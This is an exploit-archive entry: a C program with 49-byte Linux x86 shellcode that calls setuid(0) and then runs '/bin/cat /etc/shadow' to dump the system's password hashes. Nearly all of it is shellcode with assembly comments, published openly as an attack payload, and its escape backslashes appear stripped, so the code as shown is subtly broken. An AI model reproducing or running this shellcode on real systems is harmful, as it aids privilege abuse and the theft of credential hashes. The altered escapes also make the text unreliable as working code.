[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux - setuid(0) and cat /etc/shadow
# Published : 2009-12-04
# Author : ka0x
# Previous Title : win xp sp2 PEB ISbeingdebugged shellcode
# Next Title : Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes


#include <stdio.h>

/* 
	linux/x86 ; setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
	written by ka0x - <ka0x01[alt+64]gmail.com>
	lun sep 21 16:40:16 CEST 2009

	greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!
*/

int main()
{
	char shellcode[] = 
			"x31xdb"		// xor ebx,ebx
			"x6ax17"		// push byte 17h	
			"x58"			// pop eax
			"xcdx80"		// int 0x80
			"x8dx43x0b"		// lea eax,[ebx+0xb]
			"x99"			// cdq
			"x52"			// push edx
			"x68x2fx63x61x74"	// push dword 0x7461632f
			"x68x2fx62x69x6e"	// push dword 0x6e69622f
			"x89xe3"		// mov ebx,esp
			"x52"			// push edx
			"x68x61x64x6fx77"	// push dword 0x776f6461
			"x68x2fx2fx73x68"	// push dword 0x68732f2f
			"x68x2fx65x74x63"	// push dword 0x6374652f
			"x89xe1"		// mov ecx,esp
			"x52"			// push edx
			"x51"			// push ecx
			"x53"			// push ebx
			"x89xe1"		// mov ecx,esp
			"xcdx80" ;		// int 80h

	printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
	(*(void(*)()) shellcode)();
	
	return 0;
}